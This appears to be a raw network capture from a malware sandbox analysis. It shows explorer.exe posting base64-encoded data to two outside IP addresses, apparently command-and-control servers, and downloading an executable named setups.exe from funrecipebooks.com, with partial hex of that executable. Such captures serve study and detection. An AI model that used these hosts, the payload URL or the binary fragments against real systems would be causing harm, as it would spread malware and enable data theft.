heMHTatyYi+9jaTeySJOxLJ7r4RjsOtNnD04xSk8GuF1ceKcSqcW4kE5uQ273iAeQ6R88iF4sVm4016uKGMcWcRHx+uwfF0cK44IItNM0H8qbNlTX8eiOj/+b3SR0zPsB+bvelAo6PFufhm0zIPPFPy3DkzOrRzBECWVuDs683RTzNu5PwG9ktDvte3b780AGRs95LaVHjtEiWK4ux1dQVtSKng0VhbYeomxO3j+1qbtrzWjJ9Hyg4aLD7mTI2U
2024-07-27 06:54:15 UTC	16384	OUT	Data Raw: 47 78 7a 37 73 4a 4b 76 30 4b 75 30 43 2f 50 4f 7a 73 6a 47 6f 43 6a 67 41 53 65 6c 59 77 51 58 35 71 62 36 4d 6a 5a 71 47 58 51 34 69 6b 42 53 5a 4d 4d 75 69 46 4c 75 43 72 53 33 7a 54 70 79 75 69 4e 72 74 44 69 2b 36 66 79 43 46 54 78 2b 67 4f 74 79 38 44 7a 49 71 55 65 58 66 39 4e 75 63 6a 4e 4e 77 39 63 66 6e 4a 56 38 48 76 75 42 52 6a 39 4b 74 5a 4d 58 76 52 6e 73 4d 51 4e 4e 41 31 4d 33 6c 35 75 2b 6f 45 42 58 39 73 59 49 59 50 4d 49 53 31 6b 63 59 2b 6a 50 59 38 37 49 79 2b 71 35 78 55 36 45 33 2f 7a 2b 34 54 67 79 38 6b 41 63 46 42 77 2b 79 71 55 4d 75 73 4e 65 61 78 72 75 69 6e 76 2b 71 68 49 73 5a 51 31 35 47 43 2b 64 30 44 69 6b 33 77 68 79 31 47 31 2b 66 48 70 50 73 64 62 34 4b 66 34 4d 54 4c 52 78 43 73 6a 63 37 76 61 2f 45 78 70 43 61 7a 70 Data Ascii: Gxz7sJKv0Ku0C/POzsjGoCjgASelYwQX5qb6MjZqGXQ4ikBSZMMuiFLuCrS3zTpyuiNrtDi+6fyCFTx+gOty8DzIqUeXf9NucjNNw9cfnJV8HvuBRj9KtZMXvRnsMQNNA1M3l5u+oEBX9sYIYPMIS1kcY+jPY87Iy+q5xU6E3/z+4Tgy8kAcFBw+yqUMusNeaxruinv+qhIsZQ15GC+d0Dik3why1G1+fHpPsdb4Kf4MTLRxCsjc7va/ExpCazp
2024-07-27 06:54:15 UTC	16384	OUT	Data Raw: 34 54 61 43 76 30 6a 36 62 42 6a 42 2b 70 4c 36 6a 43 52 63 78 59 46 72 6a 61 44 34 31 56 61 69 32 43 37 42 77 45 76 57 30 2f 42 6b 4d 53 58 72 54 72 6a 48 30 4b 51 59 78 4f 65 38 6c 53 69 41 74 69 66 38 79 48 75 59 4b 31 4f 69 6a 44 2f 33 4a 73 41 73 72 4d 70 62 36 6d 7a 42 54 55 35 32 4e 59 6d 34 32 78 6a 46 57 5a 6b 71 42 5a 6c 74 51 65 38 77 35 74 76 46 4d 54 47 41 63 32 50 36 33 69 73 63 39 46 50 4e 51 2f 52 76 58 34 38 70 70 69 31 4b 51 41 34 68 45 7a 67 66 53 4c 67 50 77 4e 4b 54 75 50 46 70 73 42 72 55 37 4c 67 61 37 58 34 6e 2b 32 31 65 67 75 45 73 5a 45 41 73 68 62 34 79 57 6e 37 76 56 6a 68 57 2b 44 46 56 4e 70 4a 44 35 43 68 5a 7a 37 44 74 46 45 4c 71 51 77 32 73 4c 7a 52 72 38 66 63 36 4f 4e 68 39 54 4d 37 43 4e 47 42 37 70 39 68 7a 57 72 62 Data Ascii: 4TaCv0j6bBjB+pL6jCRcxYFrjaD41Vai2C7BwEvW0/BkMSXrTrjH0KQYxOe8lSiAtif8yHuYK1OijD/3JsAsrMpb6mzBTU52NYm42xjFWZkqBZltQe8w5tvFMTGAc2P63isc9FPNQ/RvX48ppi1KQA4hEzgfSLgPwNKTuPFpsBrU7Lga7X4n+21eguEsZEAshb4yWn7vVjhW+DFVNpJD5ChZz7DtFELqQw2sLzRr8fc6ONh9TM7CNGB7p9hzWrb
2024-07-27 06:54:15 UTC	16384	OUT	Data Raw: 42 62 43 51 42 58 58 34 75 4e 6c 58 34 50 64 52 55 72 67 79 52 4f 4d 41 34 57 30 59 62 45 4f 67 79 76 44 6b 79 4d 49 31 4c 44 69 54 37 55 38 76 53 53 6a 50 61 54 64 51 4a 51 53 6d 66 59 2b 77 54 54 44 75 46 49 41 6f 4e 30 51 2f 36 4d 6e 6c 51 4f 7a 4f 66 50 63 39 30 43 66 74 62 38 44 54 64 55 41 77 67 49 4a 6a 79 31 38 6a 2b 73 45 62 47 7a 73 37 6b 31 73 2f 37 47 58 6d 53 51 6e 53 59 37 41 34 7a 54 48 43 4e 71 2b 74 5a 66 36 4e 34 55 52 61 6e 45 67 31 67 35 39 71 6a 52 36 7a 6e 49 76 42 36 30 34 68 36 6e 62 61 42 5a 63 48 55 7a 32 6e 74 33 57 58 77 4e 64 31 48 4c 56 7a 55 51 6e 6f 35 34 66 30 64 67 58 31 46 30 69 6b 54 72 50 6d 55 51 4a 68 39 44 2b 6d 59 4b 64 58 4e 53 45 30 33 50 4a 41 6a 66 46 37 42 72 49 30 4f 6b 50 67 31 4a 48 52 63 7a 57 44 68 39 72 Data Ascii: BbCQBXX4uNlX4PdRUrgyROMA4W0YbEOgyvDkyMI1LDiT7U8vSSjPaTdQJQSmfY+wTTDuFIAoN0Q/6MnlQOzOfPc90Cftb8DTdUAwgIJjy18j+sEbGzs7k1s/7GXmSQnSY7A4zTHCNq+tZf6N4URanEg1g59qjR6znIvB604h6nbaBZcHUz2nt3WXwNd1HLVzUQno54f0dgX1F0ikTrPmUQJh9D+mYKdXNSE03PJAjfF7BrI0OkPg1JHRczWDh9r
2024-07-27 06:54:15 UTC	16384	OUT	Data Raw: 54 47 69 70 6c 57 53 59 64 6e 6f 36 6a 56 69 4c 7a 41 43 6d 6b 4d 72 4a 42 6a 7a 64 56 7a 4a 57 54 77 6a 6f 6f 63 7a 34 6b 61 32 7a 75 31 59 79 50 43 75 6d 6c 74 31 55 79 65 49 35 7a 64 32 54 6b 6a 78 78 41 68 4b 38 70 63 56 76 67 66 35 76 79 5a 71 44 34 63 41 73 37 32 5a 72 45 50 61 77 7a 42 44 66 2b 34 6d 54 57 38 54 33 42 58 51 37 6e 51 51 58 75 53 2b 75 6a 30 67 48 31 7a 47 59 6b 2b 4c 2b 6e 55 37 78 61 75 66 49 66 51 51 55 74 63 58 4c 74 45 37 48 68 76 74 68 31 41 74 69 49 48 5a 53 33 47 38 2b 33 50 41 34 6d 61 39 52 41 4f 79 33 45 77 32 78 51 6a 77 6a 6b 70 38 67 35 51 77 59 51 76 30 34 4a 54 43 5a 51 58 4f 6e 6e 63 66 6c 52 79 75 61 51 53 7a 6d 63 52 53 31 2b 4c 63 48 32 49 48 75 4e 6a 51 45 72 51 59 48 4a 35 76 46 6f 5a 6c 7a 34 43 68 42 37 68 31 Data Ascii: TGiplWSYdno6jViLzACmkMrJBjzdVzJWTwjoocz4ka2zu1YyPCumlt1UyeI5zd2TkjxxAhK8pcVvgf5vyZqD4cAs72ZrEPawzBDf+4mTW8T3BXQ7nQQXuS+uj0gH1zGYk+L+nU7xaufIfQQUtcXLtE7Hhvth1AtiIHZS3G8+3PA4ma9RAOy3Ew2xQjwjkp8g5QwYQv04JTCZQXOnncflRyuaQSzmcRS1+LcH2IHuNjQErQYHJ5vFoZlz4ChB7h1
2024-07-27 06:54:15 UTC	16384	OUT	Data Raw: 71 59 30 50 70 42 4c 53 6e 33 41 6c 69 55 65 6a 59 79 61 6c 51 33 34 64 64 75 4e 5a 61 2b 4f 71 78 64 71 77 6f 6b 64 2f 50 47 53 6d 37 77 55 6e 30 61 4a 43 50 75 41 6d 4a 34 74 63 6b 35 45 41 56 56 32 70 73 4d 78 35 6a 32 56 53 4a 2b 2b 39 69 55 74 63 69 58 5a 4b 66 6c 49 67 68 76 46 57 53 6b 43 4c 43 70 79 62 41 30 6e 69 37 39 47 33 4d 71 35 6b 72 54 32 66 4d 72 67 61 7a 65 44 77 35 42 70 70 6f 70 66 62 74 4f 63 39 79 48 6d 4f 4f 34 4a 64 6d 6b 7a 58 4b 66 4f 43 59 7a 32 79 7a 4b 6c 76 45 7a 45 68 52 31 41 52 75 62 6c 50 61 73 75 42 44 47 4f 31 63 41 57 2b 59 59 6e 37 71 45 45 55 2f 51 72 71 32 53 6d 45 6a 62 75 33 4b 4f 63 6d 74 61 65 31 39 31 4c 79 47 4a 38 70 64 47 6d 4f 36 66 6e 68 68 79 6b 70 44 39 4a 63 4d 65 6a 2b 50 50 48 2b 5a 53 79 6e 68 50 30 Data Ascii: qY0PpBLSn3AliUejYyalQ34dduNZa+Oqxdqwokd/PGSm7wUn0aJCPuAmJ4tck5EAVV2psMx5j2VSJ++9iUtciXZKflIghvFWSkCLCpybA0ni79G3Mq5krT2fMrgazeDw5BppopfbtOc9yHmOO4JdmkzXKfOCYz2yzKlvEzEhR1ARublPasuBDGO1cAW+YYn7qEEU/Qrq2SmEjbu3KOcmtae191LyGJ8pdGmO6fnhhykpD9JcMej+PPH+ZSynhP0
2024-07-27 06:54:15 UTC	16384	OUT	Data Raw: 73 74 72 79 39 35 4f 65 31 76 33 59 47 47 76 46 38 62 36 31 52 69 7a 48 7a 70 43 77 6a 49 42 45 7a 44 70 70 56 32 56 78 44 66 7a 2f 57 58 62 32 6f 75 5a 5a 6e 2b 58 6c 69 53 48 66 5a 4a 70 72 76 33 52 35 32 48 66 43 35 7a 42 6a 46 73 44 50 2f 62 67 6e 64 30 30 7a 50 52 61 61 35 41 50 65 6d 52 39 54 61 42 51 6e 42 58 56 36 56 6f 51 57 70 79 4c 52 76 61 6c 4d 66 41 47 7a 79 58 46 57 75 43 4b 69 35 49 31 46 46 69 64 69 59 69 53 72 62 45 33 65 70 35 63 31 30 5a 34 59 53 61 7a 64 2f 7a 46 42 41 58 6e 54 70 41 45 4c 45 45 6e 56 7a 4f 51 6c 7a 43 6b 64 34 6c 57 75 61 55 4f 68 37 41 65 6d 6f 74 4d 4f 65 39 71 65 72 57 4f 48 4c 44 54 6a 32 59 66 69 54 69 61 56 45 55 64 66 70 6b 77 6b 48 62 7a 67 4b 63 7a 4e 71 42 77 45 56 76 50 58 36 53 35 68 42 4b 49 35 71 58 30 Data Ascii: stry95Oe1v3YGGvF8b61RizHzpCwjIBEzDppV2VxDfz/WXb2ouZZn+XliSHfZJprv3R52HfC5zBjFsDP/bgnd00zPRaa5APemR9TaBQnBXV6VoQWpyLRvalMfAGzyXFWuCKi5I1FFidiYiSrbE3ep5c10Z4YSazd/zFBAXnTpAELEEnVzOQlzCkd4lWuaUOh7AemotMOe9qerWOHLDTj2YfiTiaVEUdfpkwkHbzgKczNqBwEVvPX6S5hBKI5qX0
2024-07-27 06:54:15 UTC	16384	OUT	Data Raw: 50 71 32 32 70 72 37 73 51 32 42 32 48 6f 7a 44 6c 7a 56 49 2b 35 56 4d 65 6a 2f 6e 39 41 7a 61 45 4a 71 6b 35 37 41 6b 45 45 45 35 78 34 66 57 79 46 35 4b 65 63 54 65 54 64 58 56 43 6f 57 50 68 64 6d 4a 79 37 7a 39 71 31 62 4b 75 58 36 4a 2f 2b 38 6b 75 59 45 31 50 75 61 4c 4e 4c 64 57 4c 39 6e 65 72 6b 46 6e 30 38 6c 66 2f 67 6f 45 57 79 4e 41 35 4e 65 43 6f 67 73 6c 5a 72 58 4b 4d 43 70 39 2f 37 5a 6a 61 51 61 4e 61 52 5a 55 67 47 48 57 4c 31 77 2b 35 33 35 6b 72 6a 62 77 75 6c 75 59 6e 7a 31 53 79 2f 54 4a 6e 64 6f 72 32 49 61 57 6a 50 6f 61 42 6c 58 73 56 39 71 7a 58 67 49 32 4d 45 6f 72 75 6d 43 77 78 4c 42 45 52 2f 6f 45 4d 4e 75 65 32 51 47 39 65 57 44 56 66 41 4e 76 4e 6d 79 62 68 72 37 51 33 69 43 42 43 4c 31 64 61 70 6c 4b 56 64 54 41 45 37 57 Data Ascii: Pq22pr7sQ2B2HozDlzVI+5VMej/n9AzaEJqk57AkEEE5x4fWyF5KecTeTdXVCoWPhdmJy7z9q1bKuX6J/+8kuYE1PuaLNLdWL9nerkFn08lf/goEWyNA5NeCogslZrXKMCp9/7ZjaQaNaRZUgGHWL1w+535krjbwuluYnz1Sy/TJndor2IaWjPoaBlXsV9qzXgI2MEorumCwxLBER/oEMNue2QG9eWDVfANvNmybhr7Q3iCBCL1daplKVdTAE7W
2024-07-27 06:54:15 UTC	8439	OUT	Data Raw: 66 73 4b 64 62 47 51 6f 78 64 54 64 30 30 6a 4d 30 49 68 71 50 4d 32 38 39 51 36 51 55 61 30 6b 38 47 6a 47 78 6e 56 4c 4d 58 44 72 49 7a 33 6f 49 30 75 58 39 4f 47 57 64 30 4e 32 6e 4a 42 31 63 73 51 33 49 61 38 47 70 42 68 2f 45 77 6d 76 4f 52 4d 69 35 79 6e 48 2b 45 43 71 55 71 67 44 32 32 30 53 78 39 61 66 70 77 58 34 64 65 43 2b 6c 73 4a 4d 35 70 59 63 52 38 70 74 30 4b 56 53 68 6e 68 53 6b 39 73 4e 30 2f 2b 4a 51 72 45 59 62 6e 6a 32 6f 42 65 37 39 46 46 47 77 79 41 2f 6b 4a 42 73 67 4f 43 31 63 35 72 7a 57 35 48 53 36 6d 62 52 45 6a 39 6b 4c 74 69 67 48 59 68 5a 33 56 53 47 7a 66 7a 68 69 38 74 49 78 69 6e 64 45 54 6a 64 31 65 62 66 6c 79 41 33 48 69 65 5a 7a 2b 68 76 77 78 48 4c 7a 31 64 48 68 4d 64 67 59 62 37 6d 52 57 76 34 46 38 47 78 44 77 4a Data Ascii: fsKdbGQoxdTd00jM0IhqPM289Q6QUa0k8GjGxnVLMXDrIz3oI0uX9OGWd0N2nJB1csQ3Ia8GpBh/EwmvORMi5ynH+ECqUqgD220Sx9afpwX4deC+lsJM5pYcR8pt0KVShnhSk9sN0/+JQrEYbnj2oBe79FFGwyA/kJBsgOC1c5rzW5HS6mbREj9kLtigHYhZ3VSGzfzhi8tIxindETjd1ebflyA3HieZz+hvwxHLz1dHhMdgYb7mRWv4F8GxDwJ
2024-07-27 06:54:17 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:54:17 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	50698	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:18 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1288
2024-07-27 06:54:18 UTC	1288	OUT	Data Raw: 53 37 46 5a 46 69 55 4a 44 70 59 6b 48 4a 55 64 4a 53 6b 54 74 4c 64 6f 41 70 59 6d 4b 39 75 45 73 49 2f 6a 66 77 30 71 64 37 6a 54 73 71 74 70 2b 50 49 35 50 45 4a 52 7a 6e 4c 73 70 4d 31 34 30 50 49 4a 50 36 53 58 62 52 39 38 5a 5a 38 50 44 36 52 4e 74 56 45 57 4d 74 6e 39 72 36 2b 6d 62 41 6e 48 4a 44 55 34 73 33 43 43 61 72 30 72 32 4c 6a 43 5a 33 68 75 47 66 6b 36 4c 74 50 2b 6f 75 65 7a 70 30 66 35 71 66 4b 51 49 6e 35 7a 31 35 50 55 30 56 6a 70 31 46 6c 34 49 47 71 56 58 4c 75 33 79 32 32 75 4e 32 69 66 69 68 53 49 4b 69 41 68 6f 49 4a 4b 78 31 4e 79 76 7a 74 65 6d 70 6c 63 71 66 41 71 4c 6d 39 58 41 47 43 59 46 37 38 74 50 53 31 56 66 6e 2f 4f 6b 74 56 72 58 32 55 73 2f 39 6e 4a 76 66 67 75 72 78 58 30 58 74 41 6c 62 49 30 57 41 4d 4a 49 46 76 78 Data Ascii: S7FZFiUJDpYkHJUdJSkTtLdoApYmK9uEsI/jfw0qd7jTsqtp+PI5PEJRznLspM140PIJP6SXbR98ZZ8PD6RNtVEWMtn9r6+mbAnHJDU4s3CCar0r2LjCZ3huGfk6LtP+ouezp0f5qfKQIn5z15PU0Vjp1Fl4IGqVXLu3y22uN2ifihSIKiAhoIJKx1NyvztemplcqfAqLm9XAGCYF78tPS1Vfn/OktVrX2Us/9nJvfgurxX0XtAlbI0WAMJIFvx
2024-07-27 06:54:19 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:54:19 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:54:19 UTC	685	IN	Data Raw: 64 73 57 46 6e 6a 74 52 51 4f 69 47 38 33 4a 44 6e 4a 45 65 70 32 54 6f 4c 58 5a 31 6f 44 74 64 69 79 78 54 42 33 71 76 48 6f 73 75 70 43 33 37 48 33 32 55 31 45 4f 54 78 77 50 68 58 6a 46 33 79 74 4f 50 69 54 77 4d 43 4e 34 52 51 4b 34 72 6d 72 4a 51 54 4a 64 42 73 36 32 50 50 31 52 79 33 77 44 4c 38 77 62 78 36 6e 65 31 2f 54 35 73 50 67 5a 67 74 37 6a 43 30 73 6c 6e 73 45 4d 6f 48 45 2f 31 48 5a 66 77 63 44 47 7a 78 6e 6a 69 35 49 6a 56 56 66 4d 52 48 56 71 64 46 75 34 6f 70 61 4c 71 31 66 63 6b 63 47 64 32 79 72 30 33 54 31 2b 37 59 50 6d 47 66 61 61 38 73 6b 52 42 76 38 33 6f 64 41 49 35 5a 44 4e 32 6c 71 6e 59 74 57 33 69 6a 61 53 4c 39 49 73 44 68 56 33 2b 67 34 63 71 42 6f 63 4e 4e 72 34 6c 2f 46 61 4a 45 68 5a 31 48 62 7a 58 4c 49 73 31 76 62 6a Data Ascii: dsWFnjtRQOiG83JDnJEep2ToLXZ1oDtdiyxTB3qvHosupC37H32U1EOTxwPhXjF3ytOPiTwMCN4RQK4rmrJQTJdBs62PP1Ry3wDL8wbx6ne1/T5sPgZgt7jC0slnsEMoHE/1HZfwcDGzxnji5IjVVfMRHVqdFu4opaLq1fckcGd2yr03T1+7YPmGfaa8skRBv83odAI5ZDN2lqnYtW3ijaSL9IsDhV3+g4cqBocNNr4l/FaJEhZ1HbzXLIs1vbj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	50701	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:20 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:54:20 UTC	1122	OUT	Data Raw: 46 4e 79 70 72 47 5a 70 2b 71 42 31 5a 51 57 53 72 71 4d 78 36 69 4f 70 55 31 66 53 44 35 46 34 71 6d 31 45 6c 77 32 5a 44 4d 67 4d 43 2b 53 2f 47 4b 53 31 6d 44 79 68 74 62 74 46 68 76 51 36 52 4e 34 48 4a 6f 2f 58 57 5a 31 4c 33 37 52 42 68 37 73 46 34 4f 7a 63 75 74 76 49 39 69 51 73 64 64 44 63 47 67 44 4b 45 50 61 65 2f 36 46 30 2b 32 4f 59 55 35 68 39 50 42 63 64 5a 7a 45 6c 43 44 2f 79 69 77 46 31 2f 45 47 55 4c 58 67 41 57 48 30 63 62 4d 4e 51 57 57 5a 58 33 49 4b 53 78 2f 35 39 63 54 62 49 45 79 73 33 4b 71 73 59 77 45 4f 41 79 32 66 76 78 59 68 72 53 72 32 70 67 78 44 75 56 38 79 4a 74 59 4b 54 32 63 35 66 4c 2b 47 55 2b 30 61 45 4f 38 50 6b 2f 78 52 72 4b 41 6e 70 50 36 6a 72 31 6b 61 44 76 58 51 57 48 43 64 6c 62 41 68 61 58 75 31 71 33 43 7a Data Ascii: FNyprGZp+qB1ZQWSrqMx6iOpU1fSD5F4qm1Elw2ZDMgMC+S/GKS1mDyhtbtFhvQ6RN4HJo/XWZ1L37RBh7sF4OzcutvI9iQsddDcGgDKEPae/6F0+2OYU5h9PBcdZzElCD/yiwF1/EGULXgAWH0cbMNQWWZX3IKSx/59cTbIEys3KqsYwEOAy2fvxYhrSr2pgxDuV8yJtYKT2c5fL+GU+0aEO8Pk/xRrKAnpP6jr1kaDvXQWHCdlbAhaXu1q3Cz
2024-07-27 06:54:21 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:54:21 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:54:21 UTC	685	IN	Data Raw: 76 6e 68 76 2f 39 6d 77 41 6f 2b 78 56 65 42 58 62 35 4e 4f 46 6e 47 4e 35 48 33 73 47 41 79 73 76 46 6c 75 33 43 50 46 45 5a 42 77 74 35 75 69 66 41 74 4e 6d 55 6e 76 45 7a 4d 42 4d 6a 73 77 72 6f 34 63 6e 5a 5a 72 78 4b 50 53 7a 47 76 74 4f 57 56 79 5a 57 65 6e 49 68 56 34 57 63 36 71 2b 4a 46 77 37 58 62 55 53 41 71 33 38 56 66 41 4f 63 2b 6c 75 48 52 76 30 36 42 79 7a 62 49 37 51 43 74 7a 6d 44 58 53 74 56 58 57 7a 2b 6b 45 66 66 46 67 6f 6e 57 56 63 38 46 48 70 73 4a 64 69 4a 2f 38 57 69 4d 79 6b 64 34 45 36 71 37 4c 37 51 6e 72 59 62 64 6a 77 49 34 43 6d 72 4f 38 48 6e 53 7a 54 70 54 6e 4c 6b 50 65 2b 45 66 53 2f 5a 69 6c 70 30 32 73 39 30 69 71 44 73 69 2b 47 79 38 47 6e 5a 31 6d 55 6d 32 2b 76 4a 6c 72 72 57 46 66 6a 37 72 52 31 4b 33 62 4a 50 67 Data Ascii: vnhv/9mwAo+xVeBXb5NOFnGN5H3sGAysvFlu3CPFEZBwt5uifAtNmUnvEzMBMjswro4cnZZrxKPSzGvtOWVyZWenIhV4Wc6q+JFw7XbUSAq38VfAOc+luHRv06ByzbI7QCtzmDXStVXWz+kEffFgonWVc8FHpsJdiJ/8WiMykd4E6q7L7QnrYbdjwI4CmrO8HnSzTpTnLkPe+EfS/Zilp02s90iqDsi+Gy8GnZ1mUm2+vJlrrWFfj7rR1K3bJPg

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	50703	162.0.235.84	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:22 UTC	166	OUT	GET /setups.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: funrecipebooks.com
2024-07-27 06:54:22 UTC	289	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 content-type: application/x-msdownload last-modified: Wed, 24 Jul 2024 14:01:43 GMT accept-ranges: bytes content-length: 141944 date: Sat, 27 Jul 2024 06:54:22 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2024-07-27 06:54:22 UTC	16095	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 0a d1 c2 65 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 30 00 00 34 01 00 00 ce 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 02 00 00 02 00 00 10 b8 02 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEde"04 @ @`@@
2024-07-27 06:54:22 UTC	5499	IN	Data Raw: 00 0a dc 06 6f 0d 01 00 0a 07 2a 11 05 2a 00 00 00 41 1c 00 00 02 00 00 00 3e 00 00 00 66 01 00 00 a4 01 00 00 0a 00 00 00 00 00 00 00 13 30 03 00 72 00 00 00 29 00 00 11 15 0a 73 31 01 00 06 0b 07 7b c2 00 00 04 04 6f 25 01 00 0a 07 03 7d bf 00 00 04 16 0c 2b 34 05 08 6f 30 01 00 0a 6f 31 01 00 0a 0d 09 72 60 14 00 70 7e b6 00 00 0a 6f 7c 00 00 0a 0d 07 7b c5 00 00 04 6f 32 01 00 0a 09 6f 33 01 00 0a 26 08 17 58 0c 08 05 6f 34 01 00 0a 32 c3 07 6f b2 00 00 0a 26 07 7b c0 00 00 04 0a 07 6f 0d 01 00 0a 06 2a 00 00 1b 30 05 00 9a 00 00 00 2a 00 00 11 03 6f 33 00 00 0a 2d 07 72 6a 14 00 70 10 01 04 6f 33 00 00 0a 2d 07 72 b6 14 00 70 10 02 00 0e 04 6f 33 00 00 0a 2d 15 72 e4 14 00 70 03 04 05 72 b5 05 00 70 28 5f 00 00 06 0a 2b 10 0e 04 03 04 05 72 b5 05 00 Data Ascii: o*A>f0r)s1{o%}+4o0o1r`p~o\|{o2o3&Xo42o&{o0*o3-rjpo3-rpo3-rprp(_+r
2024-07-27 06:54:22 UTC	16384	IN	Data Raw: 6f 81 01 00 0a 02 7b 99 00 00 04 6f 81 01 00 0a 20 b8 0b 00 00 0a 02 28 81 00 00 0a 6f 82 00 00 0a 28 83 00 00 0a 0b 1f 21 8d 8f 00 00 01 25 d0 c7 00 00 04 28 44 00 00 0a 0c 07 06 73 3b 00 00 0a 1f 0a 73 3b 00 00 0a 28 f3 00 00 06 13 06 11 06 16 28 3e 00 00 0a 28 3d 00 00 0a 2c 01 2a 07 11 06 28 f6 00 00 06 13 07 11 07 8d 8f 00 00 01 13 08 20 00 02 00 00 8d 8f 00 00 01 26 07 11 06 28 f4 00 00 06 28 f5 00 00 06 11 08 16 11 07 28 3f 00 00 0a 11 08 11 07 08 28 0a 01 00 06 13 09 28 41 00 00 0a 11 09 6f 42 00 00 0a 0d 09 1f 7c 6f 24 00 00 0a 13 0a 11 0a 15 2e 41 09 16 11 0a 6f 25 00 00 0a 13 05 09 16 6f 24 00 00 0a 13 0b 09 11 0a 17 58 11 0b 11 0a 59 17 59 6f 25 00 00 0a 13 04 02 7b 98 00 00 04 11 05 6f 82 01 00 0a 02 7b 99 00 00 04 11 04 6f 82 01 00 0a 11 06 Data Ascii: o{o (o(!%(Ds;s;((>(=,*( &(((?((AoB\|o$.Ao%o$XYYo%{o{o
2024-07-27 06:54:22 UTC	16384	IN	Data Raw: 86 18 bd 30 c2 11 9a 01 00 00 00 00 80 00 96 20 01 36 c9 11 9d 01 00 00 00 00 80 00 96 20 1c 36 de 11 a7 01 00 00 00 00 80 00 96 20 e2 2c f5 11 b0 01 00 00 00 00 80 00 96 20 e2 2c ff 11 b5 01 00 00 00 00 80 00 96 20 ff 2c 09 12 ba 01 00 00 00 00 80 00 96 20 ff 2c 1c 12 c3 01 28 8d 00 00 00 00 96 00 9f 2a 2c 12 cc 01 fc 8d 00 00 00 00 96 00 a3 1c 34 12 cf 01 34 8f 00 00 00 00 96 00 7b 1c 3c 12 d2 01 6c 8f 00 00 00 00 96 00 7b 1c 42 12 d3 01 a2 8f 00 00 00 00 86 18 bd 30 06 00 d5 01 00 20 01 00 9f 12 00 20 02 00 da 13 00 00 03 00 ec 34 00 20 01 00 d0 1e 00 00 02 00 ec 34 00 00 01 00 ec 34 00 20 01 00 1d 13 00 00 02 00 ec 34 00 20 01 00 d9 14 00 20 02 00 ac 08 00 20 03 00 69 24 00 20 04 00 60 2b 00 20 01 00 31 14 00 00 02 00 49 1f 00 20 01 00 31 14 00 00 02 Data Ascii: 0 6 6 , , , ,(*,44{<l{B0 4 44 4 i$ `+ 1I 1
2024-07-27 06:54:22 UTC	16384	IN	Data Raw: 6c 6f 67 00 43 6f 6d 6d 6f 6e 44 69 61 6c 6f 67 00 46 6f 6c 64 65 72 42 72 6f 77 73 65 72 44 69 61 6c 6f 67 00 53 68 6f 77 44 69 61 6c 6f 67 00 4d 73 67 00 43 6f 6d 70 75 74 65 48 61 73 68 00 52 65 66 72 65 73 68 00 42 72 75 73 68 00 47 65 74 55 4e 43 50 61 74 68 00 47 65 74 44 53 50 61 74 68 00 67 65 74 5f 50 61 74 68 00 6d 5f 44 61 74 61 50 61 74 68 00 67 65 74 5f 53 65 6c 65 63 74 65 64 50 61 74 68 00 73 65 74 5f 53 65 6c 65 63 74 65 64 50 61 74 68 00 6d 5f 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 00 67 65 74 5f 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 00 6f 72 69 67 69 6e 61 6c 50 61 74 68 00 47 65 74 46 75 6c 6c 50 61 74 68 00 6c 70 49 63 6f 6e 50 61 74 68 00 67 65 74 5f 53 74 61 72 74 75 70 50 61 74 68 00 47 65 74 46 6f 6c 64 65 72 50 61 74 68 00 Data Ascii: logCommonDialogFolderBrowserDialogShowDialogMsgComputeHashRefreshBrushGetUNCPathGetDSPathget_Pathm_DataPathget_SelectedPathset_SelectedPathm_ExecutablePathget_ExecutablePathoriginalPathGetFullPathlpIconPathget_StartupPathGetFolderPath
